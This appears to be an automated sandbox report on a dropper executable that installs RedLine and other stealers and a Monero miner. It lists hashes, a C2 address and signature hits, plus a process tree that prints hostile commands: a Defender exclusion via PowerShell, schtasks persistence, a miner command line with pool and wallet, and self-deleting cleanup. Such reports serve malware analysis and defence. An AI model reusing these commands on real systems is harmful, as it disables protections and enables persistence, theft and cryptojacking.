Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
09-09-2021 17:41
210909-v9lgtabfhq 1009-09-2021 04:26
210909-e21nrsfee3 1008-09-2021 21:37
210908-1gnpcsfbc9 1008-09-2021 21:29
210908-1bx1vafbc5 1008-09-2021 13:52
210908-q6fd6shgdj 1007-09-2021 18:07
210907-wqa3eagcgr 10Analysis
-
max time kernel
32s -
max time network
584s -
platform
windows7_x64 -
resource
win7-de -
submitted
08-09-2021 13:52
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
General
-
Target
setup_x86_x64_install.exe
-
Size
2.9MB
-
MD5
3f1f81101d0ce95fdfac97f5913cd662
-
SHA1
8e615a64e4d72b08926242b7d73a608bdd7e9fce
-
SHA256
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
-
SHA512
a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285
Malware Config
Extracted
redline
Jayson
95.181.172.207:56915
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2528 2440 rundll32.exe 55 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2204 2440 rundll32.exe 55 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7068 2440 rundll32.exe 55 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral4/memory/2696-213-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/2696-215-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/2696-221-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/1732-234-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/2432-279-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/944-292-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/1052-307-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/820-317-0x000000000041C5E2-mapping.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral4/files/0x0001000000012f04-149.dat family_socelars behavioral4/files/0x0001000000012f04-137.dat family_socelars behavioral4/files/0x0001000000012f04-154.dat family_socelars -
resource yara_rule behavioral4/files/0x0001000000012f08-120.dat redline behavioral4/files/0x0001000000012f08-155.dat redline behavioral4/files/0x0001000000012f08-161.dat redline behavioral4/files/0x0001000000012f08-160.dat redline behavioral4/files/0x0001000000012f08-151.dat redline behavioral4/files/0x0001000000012f08-150.dat redline -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
resource yara_rule behavioral4/files/0x0001000000012efc-69.dat aspack_v212_v242 behavioral4/files/0x0002000000012ef6-72.dat aspack_v212_v242 behavioral4/files/0x0002000000012ef6-71.dat aspack_v212_v242 behavioral4/files/0x0001000000012efc-70.dat aspack_v212_v242 behavioral4/files/0x0001000000012efe-75.dat aspack_v212_v242 behavioral4/files/0x0001000000012efe-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 1732 setup_installer.exe 1992 setup_install.exe 1788 Tue11d7385a978cc.exe 1852 Tue11b9d76a96506.exe 1044 Tue1109eec571ac.exe 1952 Tue11bc0507b56295.exe 2016 Tue11141271fbe5877f.exe 820 Tue118f55232e4.exe 836 Tue11e4e580f2e8141a3.exe 660 Tue11b9d76a96506.tmp 1508 Tue112c483dd3245d.exe -
Loads dropped DLL 45 IoCs
pid Process 1080 setup_x86_x64_install.exe 1732 setup_installer.exe 1732 setup_installer.exe 1732 setup_installer.exe 1732 setup_installer.exe 1732 setup_installer.exe 1732 setup_installer.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1748 cmd.exe 568 cmd.exe 1788 Tue11d7385a978cc.exe 1788 Tue11d7385a978cc.exe 1672 cmd.exe 1672 cmd.exe 1852 Tue11b9d76a96506.exe 1852 Tue11b9d76a96506.exe 1040 cmd.exe 1040 cmd.exe 1468 cmd.exe 1044 Tue1109eec571ac.exe 1044 Tue1109eec571ac.exe 1584 cmd.exe 1780 cmd.exe 1780 cmd.exe 836 Tue11e4e580f2e8141a3.exe 836 Tue11e4e580f2e8141a3.exe 1852 Tue11b9d76a96506.exe 1952 Tue11bc0507b56295.exe 1952 Tue11bc0507b56295.exe 1104 cmd.exe 1104 cmd.exe 820 Tue118f55232e4.exe 820 Tue118f55232e4.exe 660 Tue11b9d76a96506.tmp 660 Tue11b9d76a96506.tmp 660 Tue11b9d76a96506.tmp 1508 Tue112c483dd3245d.exe 1508 Tue112c483dd3245d.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6224 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 63 ip-api.com 272 api.2ip.ua 273 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2836 1508 WerFault.exe 42 3020 1968 WerFault.exe 74 4192 2936 WerFault.exe 68 5176 2720 WerFault.exe 95 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3204 schtasks.exe 340 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2084 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 2656 taskkill.exe 2904 taskkill.exe 2396 taskkill.exe 1876 taskkill.exe 4696 taskkill.exe 5340 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Tue11e4e580f2e8141a3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Tue11e4e580f2e8141a3.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1952 Tue11bc0507b56295.exe 1952 Tue11bc0507b56295.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 820 Tue118f55232e4.exe Token: SeAssignPrimaryTokenPrivilege 820 Tue118f55232e4.exe Token: SeLockMemoryPrivilege 820 Tue118f55232e4.exe Token: SeIncreaseQuotaPrivilege 820 Tue118f55232e4.exe Token: SeMachineAccountPrivilege 820 Tue118f55232e4.exe Token: SeTcbPrivilege 820 Tue118f55232e4.exe Token: SeSecurityPrivilege 820 Tue118f55232e4.exe Token: SeTakeOwnershipPrivilege 820 Tue118f55232e4.exe Token: SeLoadDriverPrivilege 820 Tue118f55232e4.exe Token: SeSystemProfilePrivilege 820 Tue118f55232e4.exe Token: SeSystemtimePrivilege 820 Tue118f55232e4.exe Token: SeProfSingleProcessPrivilege 820 Tue118f55232e4.exe Token: SeIncBasePriorityPrivilege 820 Tue118f55232e4.exe Token: SeCreatePagefilePrivilege 820 Tue118f55232e4.exe Token: SeCreatePermanentPrivilege 820 Tue118f55232e4.exe Token: SeBackupPrivilege 820 Tue118f55232e4.exe Token: SeRestorePrivilege 820 Tue118f55232e4.exe Token: SeShutdownPrivilege 820 Tue118f55232e4.exe Token: SeDebugPrivilege 820 Tue118f55232e4.exe Token: SeAuditPrivilege 820 Tue118f55232e4.exe Token: SeSystemEnvironmentPrivilege 820 Tue118f55232e4.exe Token: SeChangeNotifyPrivilege 820 Tue118f55232e4.exe Token: SeRemoteShutdownPrivilege 820 Tue118f55232e4.exe Token: SeUndockPrivilege 820 Tue118f55232e4.exe Token: SeSyncAgentPrivilege 820 Tue118f55232e4.exe Token: SeEnableDelegationPrivilege 820 Tue118f55232e4.exe Token: SeManageVolumePrivilege 820 Tue118f55232e4.exe Token: SeImpersonatePrivilege 820 Tue118f55232e4.exe Token: SeCreateGlobalPrivilege 820 Tue118f55232e4.exe Token: 31 820 Tue118f55232e4.exe Token: 32 820 Tue118f55232e4.exe Token: 33 820 Tue118f55232e4.exe Token: 34 820 Tue118f55232e4.exe Token: 35 820 Tue118f55232e4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1080 wrote to memory of 1732 1080 setup_x86_x64_install.exe 27 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1732 wrote to memory of 1992 1732 setup_installer.exe 28 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 320 1992 setup_install.exe 32 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 1748 1992 setup_install.exe 52 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 568 1992 setup_install.exe 51 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1200 1992 setup_install.exe 49 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1992 wrote to memory of 1672 1992 setup_install.exe 48 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 1748 wrote to memory of 1788 1748 cmd.exe 47 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 320 wrote to memory of 1264 320 cmd.exe 46 PID 1992 wrote to memory of 1040 1992 setup_install.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C644404\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe4⤵
- Loads dropped DLL
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue112c483dd3245d.exeTue112c483dd3245d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 9726⤵
- Program crash
PID:2836
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue118f55232e4.exe4⤵
- Loads dropped DLL
PID:1584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe4⤵
- Loads dropped DLL
PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe4⤵
- Loads dropped DLL
PID:1780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe4⤵
- Loads dropped DLL
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone4⤵
- Loads dropped DLL
PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe4⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11f251db82fb7b.exeTue11f251db82fb7b.exe5⤵PID:2644
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2844
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2960
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3140
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3204
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3324
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2748
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:340
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:3584
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:4512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:3024
-
C:\Users\Admin\AppData\Roaming\3340900.exe"C:\Users\Admin\AppData\Roaming\3340900.exe"8⤵PID:1660
-
-
C:\Users\Admin\AppData\Roaming\6006903.exe"C:\Users\Admin\AppData\Roaming\6006903.exe"8⤵PID:1672
-
-
C:\Users\Admin\AppData\Roaming\1201222.exe"C:\Users\Admin\AppData\Roaming\1201222.exe"8⤵PID:3348
-
-
C:\Users\Admin\AppData\Roaming\3822278.exe"C:\Users\Admin\AppData\Roaming\3822278.exe"8⤵PID:3560
-
-
C:\Users\Admin\AppData\Roaming\1864563.exe"C:\Users\Admin\AppData\Roaming\1864563.exe"8⤵PID:3772
-
-
-
C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"7⤵PID:2040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:2656
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:2084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:1968
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1968 -s 13928⤵
- Program crash
PID:3020
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1432
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1684
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:2396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\is-52E49.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-52E49.tmp\setup_2.tmp" /SL5="$60174,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:2756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2764
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe4⤵
- Loads dropped DLL
PID:568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11bc0507b56295.exeTue11bc0507b56295.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11141271fbe5877f.exeTue11141271fbe5877f.exe1⤵
- Executes dropped EXE
PID:2016 -
C:\ProgramData\3854752.exe"C:\ProgramData\3854752.exe"2⤵PID:2936
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2936 -s 17363⤵
- Program crash
PID:4192
-
-
-
C:\ProgramData\321689.exe"C:\ProgramData\321689.exe"2⤵PID:3048
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵PID:2288
-
-
-
C:\ProgramData\5298021.exe"C:\ProgramData\5298021.exe"2⤵PID:912
-
-
C:\ProgramData\975879.exe"C:\ProgramData\975879.exe"2⤵PID:2600
-
-
C:\ProgramData\6535577.exe"C:\ProgramData\6535577.exe"2⤵PID:2720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 17643⤵
- Program crash
PID:5176
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeTue11e4e580f2e8141a3.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:836 -
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2732
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:1020
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:796
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2652
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:944
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:1052
-
-
